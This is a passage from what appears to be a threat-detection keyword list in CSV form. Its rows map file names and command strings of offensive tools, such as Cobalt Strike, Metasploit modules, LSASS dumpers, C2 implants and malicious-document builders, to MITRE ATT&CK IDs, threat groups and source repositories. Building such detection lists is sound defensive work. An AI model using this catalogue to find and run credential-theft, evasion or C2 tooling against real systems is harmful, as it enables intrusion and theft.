TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*openPortScanner*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*openSpearPhishDialog*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*openssl_heartbleed.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*openssl2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*OpenVAS*","offensive_tool_keyword","openvas","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://www.openvas.org/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*openwall.John.appdata.xml*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*openwall.John.desktop*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*openwall/john*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*openWindowsExecutableStage*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*opera* --headless * --dump-dom http*","greyware_tool_keyword","chromium","Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers","T1553.002 - T1059.005 - T1071.001 - T1561","TA0002","N/A","N/A","Defense Evasion","https://redcanary.com/blog/intelligence-insights-june-2023/","1","0","N/A","4","5","N/A","N/A","N/A","N/A" +"*opera.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*","greyware_tool_keyword","chromium","The --load-extension switch allows the source to specify a target directory to load as an extension. This gives malware the opportunity to start a new browser window with their malicious extension loaded.","T1136.001 - T1176 - T1059.007","TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://www.mandiant.com/resources/blog/lnk-between-browsers","1","0","risk of false positives","7","10","N/A","N/A","N/A","N/A" +"*Operative Framework*","offensive_tool_keyword","Operative Framework","Framework based on fingerprint action. this tool is used for get information on a website or a enterprise target with multiple modules.","T1590 - T1591 - T1592 - T1593 - T1594 - T1595","TA0007 - TA0011 - TA0007","N/A","N/A","Frameworks","https://github.com/graniet/operative-framework","1","0","N/A","N/A","7","634","180","2023-05-12T06:20:09Z","2017-01-03T08:38:59Z" +"*ophcrack*","offensive_tool_keyword","ophcrack","Windows password cracker based on rainbow tables.","T1110.003 - T1555.003 - T1110.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://gitlab.com/objectifsecurite/ophcrack","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*optiv/Ivy.git*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","1","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"*optiv/Registry-Recon*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor Script that Performs System/AV/EDR Recon","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Registry-Recon","1","1","N/A","10","10","314","36","2022-06-06T14:39:12Z","2021-07-29T18:47:23Z" +"*optiv/ScareCrow*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*optiv/ScareCrow*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*oracle_default_hashes.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*oracle_default_passwords.csv*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*orbitaldump.py*","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","5","440","86","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" +"*orbitaldump/orbitaldump*","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","5","440","86","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" +"*OrderFromC2 = ReadEmail()*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" +"*os.execute(*/bin/*nmap --script=$*","greyware_tool_keyword","nmap","Nmap Privilege Escalation","T1548.002 - T1059 - T1068","TA0002","N/A","N/A","Privilege Escalation","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*OS-Command-Injection-Unix-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" +"*OS-Command-Injection-Windows-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" +"*OSCP-Archives*","offensive_tool_keyword","OSCP-Archives","resources for red teamers 'During my journey to getting the OSCP. I always come across many articles. Git repo. videos. and other types of sources of great and valuable information that helps me during my studies. While having all of these in a bookmark folder is great. I wanted to also build a curated list of the resources that I've collected overtime. all in one area for everyone to access.'","T1593 - T1592 - T1596","TA0001 - TA0043 - ","N/A","N/A","Exploitation tools","https://github.com/CyDefUnicorn/OSCP-Archives","1","1","N/A","N/A","7","601","196","2020-09-14T13:01:57Z","2018-09-15T16:18:05Z" +"*osmedeus cloud*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*osmedeus health*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*osmedeus provider*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*osmedeus scan*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*osmedeus utils*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*osx/dump_keychain*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*osx_gatekeeper_bypass.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*OtterHacker/SetProcessInjection*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*ourtn-ftshell-upcommand*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","1","0","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" +"*-out*.exe -r:*System.Drawing.dll*System.Management.Automation*.dll*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","0","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" +"*--out=nimcrypt*","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","0","N/A","N/A","1","83","5","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z" +"*Out-CompressedDLL.ps1*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*Out-DnsTxt.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Outflank-Dumpert*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*Outflank-Dumpert.*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*outflanknl/Dumpert*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*outflanknl/EvilClippy*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z" +"*outflanknl/Net-GPPPassword*","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","156","37","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z" +"*outflanknl/Recon-AD*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*outflanknl/SharpHide*","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","445","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" +"*outflanknl/Spray-AD*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","408","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" +"*outflanknl/WdToggle*","offensive_tool_keyword","cobaltstrike","s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 